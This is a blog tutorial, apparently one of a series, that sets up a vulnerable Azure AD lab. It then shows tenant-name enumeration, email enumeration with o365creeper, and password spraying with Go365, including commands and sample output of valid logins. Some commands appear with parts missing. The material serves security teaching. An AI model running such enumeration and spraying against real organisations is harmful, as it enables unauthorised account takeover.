Create an Azure Vulnerable Lab: Part #6 – AAD Enumeration and Password Spraying

This article is part of a blog series where I explain common Azure vulnerabilities, how to create a lab such that it reproduces the issues, and how to exploit it. To follow this tutorial, you’ll need an Azure account and Azure CLI tool installed on your machine both of which you can get for free.

1. Azure Active Directory

Azure Active Directory (Azure AD) [..] is an enterprise identity service that provides single sign-on, multifactor authentication, and conditional access [..]Microsoft

In this lab we will see how to create an AAD tenant, how to enumerate the tenant name, discover email addresses registered in the tenant and perform password spraying attacks against them.

2. Setting up an AAD Tenant

First, login to the Azure Portal and search for Azure Active Directory

In the newly opened window, select Manage Tenants

And then Create

Fill up the details

If that is the only Tenant available on your account, it should be selected by default otherwise you can use the “Make default tenant” option in the “Manage Tenants” page.

Once you have selected the default tenant, create several new users:

For the password spraying attack, we will use the “Let me create the password” option and set it to “0xPwn0xPwn!!!123” – we will use this to demonstrate how a successful attack looks.

3. Enumerate Tenant

To start the enumeration process, we start from the company name and check possible options. For example 0xpwn could be 0xpwn, 0xpwncorp, 0xpwnorg, etc. and replace it in the<company>

The following request/response is for an organization that is registered on the Azure AD:

<RealmInfo Success="true">
<FederationBrandName>0xPwN Organization</FederationBrandName>

The following output shows that the tenant does not exist:

<RealmInfo Success="true">

4. Enumerate Accounts

Once we found out the tenant name, we can enumerate emails using o365creeper in combination with a list of emails:

bash> cat emails.txt

bash> python -f emails.txt - VALID - INVALID - VALID - INVALID

5. Password Spraying

After we identified several valid emails, we can proceed with password spraying. For this we can use Go365

bash> cat usernames

bash> ./Go365 -ul usernames -p '0xPwn0xPwn!!!123' -d -endpoint graph
[i] Using the graph endpoint...
[graph] [+] Possible valid login! : 0xPwn0xPwn!!!123
[graph] [-] Valid user, but invalid password: : 0xPwn0xPwn!!!123
[graph] [-] User not found:
[graph] [-] Valid user, but invalid password: : 0xPwn0xPwn!!!123
[graph] [-] User not found:

And that’s it! In this lab we have seen how to set up an AAD tenant with users, and starting from the company name discover the tenant, enumerate emails and password spray the accounts.

5 thoughts on “Create an Azure Vulnerable Lab: Part #6 – AAD Enumeration and Password Spraying

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s